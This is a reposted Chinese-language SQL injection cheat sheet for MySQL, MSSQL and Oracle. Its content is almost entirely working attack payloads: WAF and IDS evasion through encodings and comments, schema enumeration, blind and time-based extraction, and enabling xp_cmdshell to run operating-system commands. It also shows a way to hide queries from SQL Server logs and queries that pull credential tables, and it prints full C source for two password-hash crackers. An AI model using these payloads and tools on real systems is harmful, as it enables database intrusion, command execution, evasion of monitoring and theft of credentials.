碼上歡樂
相關內容    簡體    繁體

sql注入繞過

本文轉載自   查看原文   2018-07-09 15:27   1576 

特定於MySQL的代碼

MySQL允許你指定感嘆號后面的版本號。 注釋中的語法僅在版本大於或等於指定的版本號時執行。


Examples:
UNION SELECT /*!50000 5,null;%00*//*!40000 4,null-- ,*//*!30000 3,null-- x*/0,null--+ SELECT 1/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/); 第一個例子返回版本; 它使用了一個2列的聯合。 第二個例子演示了如何繞過WAF/IDS。

引號繞過

SELECT * FROM Users WHERE username = 0x61646D696E ---> Hex encoding. SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110) --> CHAR() Function.
 

模糊和混淆

允許中介字符

以下字符可以用作空格。

09  水平標簽
0A  新的一行
0B 垂直標簽
0C 新頁面
0D 回車
A0 不間斷的空格
20 空格

Example:
'%0A%09UNION%0CSELECT%A0NULL%20%23

圓括號也可以用來避免使用空格。
()

28  (
29  )

Example:
UNION(SELECT(column)FROM(table))

在AND/OR后允許的特征

20 Space 2B + 2D - 7E ~ 21 ! 40 @ Example: SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1)) tips: dual是一個可用於測試的虛擬表。

和注釋混淆

可以使用注釋分解查詢來欺騙WAF/IDS並避免檢測。 通過使用#或-后跟一個換行符,我們可以將查詢拆分成不同的行。

Example:
1'#
AND 0--
UNION# I am a comment!
SELECT@tmp:=table_name x FROM--
`information_schema`.tables LIMIT 1#

URL編碼的注入如下所示:

1'%23%0AAND 0--%0AUNION%23 I am a comment!%0ASELECT@tmp:=table_name x FROM--%0A`information_schema`.tables LIMIT 1%23

某些功能也可以使用注釋和空格進行混淆。

VERSION/**/%A0 (/*comment*/)

編碼

編碼有時可以用於bypass WAF/IDS。

URL Encoding --> SELECT %74able_%6eame FROM information_schema.tables; Double URL Encoding --> SELECT %2574able_%256eame FROM information_schema.tables; Unicode Encoding --> SELECT %u0074able_%u6eame FROM information_schema.tables; Invalid Hex Encoding (ASP) --> SELECT %tab%le_%na%me FROM information_schema.tables;

避免關鍵字

如果IDS/WAF阻止了某些關鍵字,還有其他方法可以在不使用編碼的情況下繞過它。

INFORMATION_SCHEMA.TABLES Example: 空格 information_schema . tables 反引號 `information_schema`.`tables` 特定的代碼 /*!information_schema.tables*/ 替代名稱 information_schema.partitions information_schema.statistics information_schema.key_column_usage information_schema.table_constraints tips: 他的替代名稱可能取決於表中存在的主鍵。

運算符

AND,&& --邏輯AND = --分配一個值(作為SET語句的一部分,或作為UPDATE語句中的SET子句的一部分) : --=分配一個值 BETWEEN ... AND ... --檢查一個值是否在一個范圍內 BINARY --將字符串轉換為二進制字符串 & --按位與 〜 --反轉位 | --按位或 ^ -- 按位XOR CASE --Case操作 DIV --整數除法 / --Division operator <=> -- NULL-safe等於運算符 = --等號運算符 >= --大於或等於運算符 > -- 大於運算符 IS NOT NULL -- NOT NULL值測試 不是根據布爾值來測試一個值 IS NULL --NULL值測試 IS --根據布爾值來測試一個值 << --Left shift <= -- 小於或等於 < -- 小於 LIKE -- 簡單的模式匹配 - -- 減號 %或MOD-- 模運算符 NOT BETWEEN ... AND ... -- 檢查一個值是否在一個范圍內 !=,<> -- 不等於運算符 NO LIKE -- 簡單模式匹配的否定 NOT REGEXP -- NOT REGEXP NOT , ! -- 否定值 || -- 或 +-- 加法運算符 REGEXP 使用正則表達式的REGEXP模式匹配 >> -- 右移 RLIKE -- REGEXP的同義詞 SOUNDS LIKE-- 比較聲音 * -- 乘法運算符 - -- 改變參數的符號 XOR -- 邏輯異或

常量

current_user
null, \N true, false
 

密碼散列

在MySQL 4.1之前,由PASSWORD()函數計算的密碼散列長度為16個字節。 這樣的哈希看起來像這樣:

PASSWORD('mypass') 6f8c114b58f2ce9e 
從MySQL 4.1開始,PASSWORD()函數已被修改為產生一個更長的41字節散列值:
PASSWORD('mypass') *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4

密碼破解

今天你cmd5了嗎?
Cain&AbelJohn the Ripper都能夠破解MySQL 3.x-6.x密碼。


MySQL <4.1密碼破解

這個工具是MySQL散列密碼的高速蠻力密碼破解工具。 它可以在普通的PC上在幾個小時內爆破一個包含任何可打印的ASCII字符的8個字符的密碼。

/* This program is public domain. Share and enjoy. * * Example: * $ gcc -O2 -fomit-frame-pointer MySQLfast.c -o MySQLfast * $ MySQLfast 6294b50f67eda209 * Hash: 6294b50f67eda209 * Trying length 3 * Trying length 4 * Found pass: barf * * The MySQL password hash function could be strengthened considerably * by: * - making two passes over the password * - using a bitwise rotate instead of a left shift * - causing more arithmetic overflows */ #include <stdio.h> typedef unsigned long u32; /* Allowable characters in password; 33-126 is printable ascii */ #define MIN_CHAR 33 #define MAX_CHAR 126 /* Maximum length of password */ #define MAX_LEN 12 #define MASK 0x7fffffffL int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary) { int i, c; u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2; u32 newstate1, newstate2, newstate3; u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2]; u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3]; i = -1; sum = 7; state1_ary[0] = 1345345333L; state2_ary[0] = 0x12345671L; while (1) { while (i < stop) { i++; pass_ary[i] = MIN_CHAR; step_ary[i] = (state1_ary[i] & 0x3f) + sum; xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8); sum += MIN_CHAR; state1_ary[i+1] = state1_ary[i] ^ xor_ary[i]; state2_ary[i+1] = state2_ary[i] + ((state2_ary[i] << 8) ^ state1_ary[i+1]); } state1 = state1_ary[i+1]; state2 = state2_ary[i+1]; step = (state1 & 0x3f) + sum; xor1 = step*MIN_CHAR + (state1 << 8); xor2 = (state2 << 8) ^ state1; for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) { newstate2 = state2 + (xor1 ^ xor2); newstate1 = state1 ^ xor1; newstate3 = (targ2 - newstate2) ^ (newstate2 << 8); div = (newstate1 & 0x3f) + sum + c; diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK; if (diff % div != 0) continue; d = diff / div; if (d < MIN_CHAR || d > MAX_CHAR) continue; div = (newstate3 & 0x3f) + sum + c + d; diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK; if (diff % div != 0) continue; e = diff / div; if (e < MIN_CHAR || e > MAX_CHAR) continue; pass_ary[i+1] = c; pass_ary[i+2] = d; pass_ary[i+3] = e; return 1; } while (i >= 0 && pass_ary[i] >= MAX_CHAR) { sum -= MAX_CHAR; i--; } if (i < 0) break; pass_ary[i]++; xor_ary[i] += step_ary[i]; sum++; state1_ary[i+1] = state1_ary[i] ^ xor_ary[i]; state2_ary[i+1] = state2_ary[i] + ((state2_ary[i] << 8) ^ state1_ary[i+1]); } return 0; } void crack(char *hash) { int i, len; u32 targ1, targ2, targ3; int pass[MAX_LEN]; if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) { printf("Invalid password hash: %s\n", hash); return; } printf("Hash: %08lx%08lx\n", targ1, targ2); targ3 = targ2 - targ1; targ3 = targ2 - ((targ3 << 8) ^ targ1); targ3 = targ2 - ((targ3 << 8) ^ targ1); targ3 = targ2 - ((targ3 << 8) ^ targ1); for (len = 3; len <= MAX_LEN; len++) { printf("Trying length %d\n", len); if ( crack0(len-4, targ1, targ3, pass) ) { printf("Found pass: "); for (i = 0; i < len; i++) putchar(pass[i]); putchar('\n'); break; } } if (len > MAX_LEN) printf("Pass not found\n"); } int main(int argc, char *argv[]) { int i; if (argc <= 1) printf("usage: %s hash\n", argv[0]); for (i = 1; i < argc; i++) crack(argv[i]); return 0; }

MSSQL

默認的數據庫

pubs    在MSSQL 2005上不可用
model   在所有版本中都可用
msdb    在所有版本中都可用
tempdb  在所有版本中都可用
northwind   在所有版本中都可用
information_schema  MSSQL 2000 或更高版本可用

注釋查詢

以下內容可用於注釋查詢:

/* -- C風格的評論
- -- SQL注釋
;%00 -- 空字節


Example:
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = ''; SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3/*';

測試版本

@@VERSION

Example:
True if MSSQL version is 2008. SELECT * FROM Users WHERE id = '1' AND @@VERSION LIKE '%2008%'; tips: 輸出還將包含Windows操作系統的版本。 數據庫憑證 數據庫..Table master..syslogins, master..sysprocesses Columns name, loginame Current User user, system_user, suser_sname(), is_srvrolemember('sysadmin') Database Credentials SELECT user, password FROM master.dbo.sysxlogins Example: 返回當前用戶: SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID; 檢查當前用戶是否是admin: SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END); Database Names Database.Table master..sysdatabases Column name Current DB DB_NAME(i) Examples: SELECT DB_NAME(5); SELECT name FROM master..sysdatabases;

主機名

@@SERVERNAME SERVERPROPERTY() Examples: SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel'), SERVERPROPERTY('edition');

tips:

SERVERPROPERTY() 只對 MSSQL 2005 或更高版本有效

列名和表名

猜解列名數量
ORDER BY n+1; Example: sql語句: SELECT username, password, permission FROM Users WHERE id = '1'; 1' ORDER BY 1-- True 1' ORDER BY 2-- True 1' ORDER BY 3-- True 1' ORDER BY 4-- False - 得出只有三列 -1' UNION SELECT 1,2,3-- True tips: 讓數字一直增加會得到一個錯誤的請求 以下內容可用於獲取當前查詢中的列。 GROUP BY / HAVING Example: sql語句: SELECT username, password, permission FROM Users WHERE id = '1'; 1' HAVING 1=1-- Column 'Users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. 1' GROUP BY username HAVING 1=1-- Column 'Users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. 1' GROUP BY username, password HAVING 1=1-- Column 'Users.permission' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. 1' GROUP BY username, password, permission HAVING 1=1-- No Error tips: 所有列都包括在內后,將不會返回任何錯誤。

猜解表名

我們可以從兩個不同的數據庫,information_schema.tables或master..sysobjects中檢索表。
union

UNION SELECT name FROM master..sysobjects WHERE xtype='U'

Blind


AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'

Error


AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables) AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))

Xtype ='U'用於用戶定義的表格。 您可以使用“V”查看。

猜解列名

我們可以從兩個不同的數據庫,information_schema.columns或masters..syscolumns中檢索這些列。
union

UNION SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename')

Blind


AND SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns > 'A'

Blind


AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns) AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns))

一次查詢多個表或列
以下3個查詢將創建一個臨時表/列,並將所有用戶定義的表格插入到其中。 然后它將轉儲表內容並刪除該表完成。

創建一個臨時表或列並插入數據:
AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=':' SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END; 轉儲內容: AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROM TMP_DB); 刪除表: AND 1=0; DROP TABLE TMP_DB; 一個更簡單的方法是從MSSQL 2005及更高版本開始。 XML函數path()作為一個連接器,允許用1個查詢檢索所有表。: SELECT table_name %2b ', ' FROM information_schema.tables FOR XML PATH('') 你也可以講你的查詢語句編碼: ' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--

引號繞過

SELECT * FROM Users WHERE username = CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110)

字符串連接

SELECT CONCAT('a','a','a'); (SQL SERVER 2012) SELECT 'a'+'d'+'mi'+'n';

條件聲明

IF CASE Examples: IF 1=1 SELECT 'true' ELSE SELECT 'false'; SELECT CASE WHEN 1=1 THEN true ELSE false END;

定時

WAITFOR DELAY 'time_to_pass'; WAITFOR TIME 'time_to_execute'; Example: IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';

OPENROWSET攻擊

SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'p4ssw0rd', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');

命令執行

包含一個名為xp_cmdshell的擴展存儲過程,可用於執行操作系統命令。

EXEC master.dbo.xp_cmdshell 'cmd';

從MSSQL 2005及更高版本開始,xp_cmdshell在默認情況下處於禁用狀態,但可以通過以下查詢來激活:

EXEC sp_configure 'show advanced options', 1 EXEC sp_configure reconfigure EXEC sp_configure 'xp_cmdshell', 1 EXEC sp_configure reconfigure

或者,您可以創建自己的過程來獲得相同的結果:


DECLARE @execmd INT EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'

如果SQL版本高於2000,則必須運行其他查詢才能執行上述命令:


EXEC sp_configure 'show advanced options', 1 EXEC sp_configure reconfigure EXEC sp_configure 'OLE Automation Procedures', 1 EXEC sp_configure reconfigure

Example:
檢查是否加載了xp_cmdshell,如果是,則檢查它是否處於活動狀態,然后繼續運行“dir”命令並將結果插入到TMP_DB中:

' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--

轉儲內容:

' UNION SELECT tbl FROM TMP_DB--

刪除表:

' DROP TABLE TMP_DB--

SP_PASSWORD(隱藏查詢)

將sp_password附加到查詢的末尾會將其從T-SQL日志中隱藏,作為安全措施。

SP_PASSWORD

Example:
' AND 1=1--sp_password Output: -- 'sp_password' was found in the text of this event. -- The text has been replaced with this comment for security reasons.

堆查詢

MSSQL 支持堆查詢

Example:
' AND 1=0 INSERT INTO ([column1], [column2]) VALUES ('value1', 'value2');

Fuzz

以下字符可以用作空格。

01 Start of Heading 02 Start of Text 03 End of Text 04 End of Transmission 05 Enquiry 06 Acknowledge 07 Bell 08 Backspace 09 Horizontal Tab 0A New Line 0B Vertical Tab 0C New Page 0D Carriage Return 0E Shift Out 0F Shift In 10 Data Link Escape 11 Device Control 1 12 Device Control 2 13 Device Control 3 14 Device Control 4 15 Negative Acknowledge 16 Synchronous Idle 17 End of Transmission Block 18 Cancel 19 End of Medium 1A Substitute 1B Escape 1C File Separator 1D Group Separator 1E Record Separator 1F Unit Separator 20 Space 25 22 " 28 ( 29 ) 5B [ 5D ] Examples: S%E%L%E%C%T%01column%02FROM%03table; A%%ND 1=%%%%%%%%1; UNION(SELECT(column)FROM(table)); SELECT"table_name"FROM[information_schema].[tables]; tips: 關鍵字之間的百分比符號只能在ASP(x)Web應用程序上使用。

AND/OR后允許的特征

01 - 20 Range 21 ! 2B + 2D - 2E . 5C \ 7E ~ Example: SELECT 1FROM[table]WHERE\1=\1AND\1=\1; tips: 反斜杠似乎不適用於MSSQL 2000。

編碼

編碼有時可以bypass WAF/IDS.

URL Encoding >>>> SELECT %74able_%6eame FROM information_schema.tables; Double URL Encoding SELECT %2574able_%256eame FROM information_schema.tables; Unicode Encoding >>>> SELECT %u0074able_%u6eame FROM information_schema.tables; Invalid Hex Encoding (ASP) >>>> SELECT %tab%le_%na%me FROM information_schema.tables; Hex Encoding >>>> ' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);-- HTML Entities (Needs to be verified) %26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2349%3B%26%2361%3B%26%2349%3B

密碼破解

密碼以0x0100開始,0x之后的第一個字節是常量; 接下來的八個字節是散列鹽,其余的80個字節是兩個散列,前40個字節是密碼的區分大小寫,而第二個40字節是大寫字母。

0x0100236A261CE12AB57BA22A7F44CE3B780E52098378B65852892EEE91C0784B911D76BF4EB124550ACABDFD1457

Password Cracking
A Metasploit module for JTR can be found here.

MSSQL 2000 Password Cracker This tool is designed to crack Microsoft SQL Server 2000 passwords. ///////////////////////////////////////////////////////////////////////////////// // // SQLCrackCl // // This will perform a dictionary attack against the // upper-cased hash for a password. Once this // has been discovered try all case variant to work // out the case sensitive password. // // This code was written by David Litchfield to // demonstrate how Microsoft SQL Server 2000 // passwords can be attacked. This can be // optimized considerably by not using the CryptoAPI. // // (Compile with VC++ and link with advapi32.lib // Ensure the Platform SDK has been installed, too!) // ////////////////////////////////////////////////////////////////////////////////// #include <stdio.h> #include <windows.h> #include <wincrypt.h> FILE *fd=NULL; char *lerr = "\nLength Error!\n"; int wd=0; int OpenPasswordFile(char *pwdfile); int CrackPassword(char *hash); int main(int argc, char *argv[]) { int err = 0; if(argc !=3) { printf("\n\n*** SQLCrack *** \n\n"); printf("C:\\>%s hash passwd-file\n\n",argv[0]); printf("David Litchfield (david@ngssoftware.com)\n"); printf("24th June 2002\n"); return 0; } err = OpenPasswordFile(argv[2]); if(err !=0) { return printf("\nThere was an error opening the password file %s\n",argv[2]); } err = CrackPassword(argv[1]); fclose(fd); printf("\n\n%d",wd); return 0; } int OpenPasswordFile(char *pwdfile) { fd = fopen(pwdfile,"r"); if(fd) return 0; else return 1; } int CrackPassword(char *hash) { char phash[100]=""; char pheader[8]=""; char pkey[12]=""; char pnorm[44]=""; char pucase[44]=""; char pucfirst[8]=""; char wttf[44]=""; char uwttf[100]=""; char *wp=NULL; char *ptr=NULL; int cnt = 0; int count = 0; unsigned int key=0; unsigned int t=0; unsigned int address = 0; unsigned char cmp=0; unsigned char x=0; HCRYPTPROV hProv=0; HCRYPTHASH hHash; DWORD hl=100; unsigned char szhash[100]=""; int len=0; if(strlen(hash) !=94) { return printf("\nThe password hash is too short!\n"); } if(hash[0]==0x30 && (hash[1]== 'x' || hash[1] == 'X')) { hash = hash + 2; strncpy(pheader,hash,4); printf("\nHeader\t\t: %s",pheader); if(strlen(pheader)!=4) return printf("%s",lerr); hash = hash + 4; strncpy(pkey,hash,8); printf("\nRand key\t: %s",pkey); if(strlen(pkey)!=8) return printf("%s",lerr); hash = hash + 8; strncpy(pnorm,hash,40); printf("\nNormal\t\t: %s",pnorm); if(strlen(pnorm)!=40) return printf("%s",lerr); hash = hash + 40; strncpy(pucase,hash,40); printf("\nUpper Case\t: %s",pucase); if(strlen(pucase)!=40) return printf("%s",lerr); strncpy(pucfirst,pucase,2); sscanf(pucfirst,"%x",&cmp); } else { return printf("The password hash has an invalid format!\n"); } printf("\n\n Trying...\n"); if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0)) { if(GetLastError()==NTE_BAD_KEYSET) { // KeySet does not exist. So create a new keyset if(!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_NEWKEYSET )) { printf("FAILLLLLLL!!!"); return FALSE; } } } while(1) { // get a word to try from the file ZeroMemory(wttf,44); if(!fgets(wttf,40,fd)) return printf("\nEnd of password file. Didn't find the password.\n"); wd++; len = strlen(wttf); wttf[len-1]=0x00; ZeroMemory(uwttf,84); // Convert the word to UNICODE while(count < len) { uwttf[cnt]=wttf[count]; cnt++; uwttf[cnt]=0x00; count++; cnt++; } len --; wp = &uwttf; sscanf(pkey,"%x",&key); cnt = cnt - 2; // Append the random stuff to the end of // the uppercase unicode password t = key >> 24; x = (unsigned char) t; uwttf[cnt]=x; cnt++; t = key << 8; t = t >> 24; x = (unsigned char) t; uwttf[cnt]=x; cnt++; t = key << 16; t = t >> 24; x = (unsigned char) t; uwttf[cnt]=x; cnt++; t = key << 24; t = t >> 24; x = (unsigned char) t; uwttf[cnt]=x; cnt++; // Create the hash if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash)) { printf("Error %x during CryptCreatHash!\n", GetLastError()); return 0; } if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0)) { printf("Error %x during CryptHashData!\n", GetLastError()); return FALSE; } CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0); // Test the first byte only. Much quicker. if(szhash[0] == cmp) { // If first byte matches try the rest ptr = pucase; cnt = 1; while(cnt < 20) { ptr = ptr + 2; strncpy(pucfirst,ptr,2); sscanf(pucfirst,"%x",&cmp); if(szhash[cnt]==cmp) cnt ++; else { break; } } if(cnt == 20) { // We've found the password printf("\nA MATCH!!! Password is %s\n",wttf); return 0; } } count = 0; cnt=0; } return 0; }

0x03 Oracle

默認數據庫

SYSTEM  所有版本
SYSAUX  所有版本

注釋查詢

以下內容可用於注釋后的其余查詢:

--  SQL comment

Example:
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';

測試版本

SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; SELECT banner FROM v$version WHERE banner LIKE 'TNS%'; SELECT version FROM v$instance; tips: Oracle中的所有SELECT語句都必須包含一個表。 dual是一個可用於測試的虛擬表.

Database Credentials

SELECT username FROM all_users; -- 所有版本
SELECT name, password from sys.user$; -- Privileged, <= 10g SELECT name, spare4 from sys.user$; -- Privileged, <= 11g

數據庫名

當前數據庫

SELECT name FROM v$database; SELECT instance_name FROM v$instance SELECT global_name FROM global_name SELECT SYS.DATABASE_NAME FROM DUAL

用戶數據庫

SELECT DISTINCT owner FROM all_tables;

服務主機名

SELECT host_name FROM v$instance; (Privileged) SELECT UTL_INADDR.get_host_name FROM dual; SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; SELECT UTL_INADDR.get_host_address FROM dual;

表名和列名

猜解表名

SELECT table_name FROM all_tables;

猜解列名:

SELECT column_name FROM all_tab_columns;

從列名查找表

SELECT column_name FROM all_tab_columns WHERE table_name = 'Users';

從表名查找列

SELECT table_name FROM all_tab_tables WHERE column_name = 'password';

一次檢索多個表

SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables;

避免使用引號

與其他RDBMS不同,Oracle允許對表/列名進行編碼。

SELECT 0x09120911091 FROM dual; Hex Encoding. SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; CHR() Function.

字符串連接

SELECT 'a'||'d'||'mi'||'n' FROM dual;

條件聲明

SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual

定時

Time Delay
SELECT UTL_INADDR.get_host_address('non-existant-domain.com') FROM dual; Heavy Time Delays AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));

特權

SELECT privilege FROM session_privs;
SELECT grantee, granted_role FROM dba_role_privs; (Privileged)

DNS Requests

SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual; SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;

Password Cracking

msf中的JTR模塊。




免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 SQL注入之waf繞過 SQL注入繞過技巧 SQL注入繞過技巧 sql注入繞過方法 SQL注入繞過方法 SQL注入繞過技巧 SQL注入的優化和繞過 SQL注入繞過技巧 SQL注入繞過技術 SQL注入的繞過
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM